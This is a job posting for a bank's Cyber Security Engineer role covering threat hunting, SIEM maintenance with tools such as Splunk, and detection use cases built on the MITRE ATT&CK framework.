Cyber Security Engineer

Overview To be part of Cyber Threat team, tier 3 SME and mentor to the SOC team. This role requires continuous detection, analysis, investigation, response, and mitigation of advanced threats before they affect the bank's IT infrastructure via a proven and documented cyberthreat model, e.g., Mitre Attack Framework.

Qualifications

4 - 5 years of information security experience

1 - 2 years supporting incident response and / or investigations

Experience reviewing and assessing logs for anomalous activity indicating the presence of a threat

Knowledge and ability to identify threat actor attack methods and track their developments

Experience using Threat Model e.g. Cyber Kill Chain & Mitre ATT&CK

Extensive experience conveying complex information in simple, succinct explanations

Exceptional attention to detail

Strong technical writing skills

Extensive experience with analytical tradecraft

Thorough understanding of cybersecurity principles

Ability to work independently and build relationships

Efficient research methodologies

Ability to relate & convert technical threats with business risks

Strong proficiency with scripting and programming languages (e.g. Python, PowerShell, Java, NodeJS, Perl, etc.)

Strong communication & writing skills for reporting and analysis on cumulative findings

Key Responsibilities

Solution

Maintaining of SIEM solution including Splunk, Imperva and etc. (Task including compliance to patch and obsolescence framework requirement)

Ensure events / logs from all relevant devices are sending to SIEM solution in a complete and accurate manner

To produce monthly SIEM system health report (completeness and accurate)

Hunting

Perform threat hunting through industry accepted methodologies including Hypothesis Driven investigation, IOC driven Investigation or Machin Leaning Investigation

Analyze host, network traffic, IDS / IPS / DLP events, packet capture, firewall logs and other relevant solutions

Provide forensic analysis of network packet captures, DNS, proxy, Netflow, malware, host-based security and application logs, as well as logs from various types of security sensors

Identify gaps in IT infrastructure by mimicking an attacker s behaviors and responses

Perform offensive validation on identified TTP's

Detection & Response

Continuously develop SIEM use cases based on Mitre Attack framework based on threat landscape

To onboard all use cases to Security Operation Center for 24 x 7 monitoring and timely response

Continuously onboard new IOC to threat prevention solution to ensure known threat are prevented at all time

Continuously improve processes for use across multiple detection sets for more efficient Security Operations

Develop dashboards and reports to identify potential threats, suspicious / anomalous activity, malware, etc.

Assist in the design, evaluation, and implementation of new security technologies

#J-18808-Ljbffr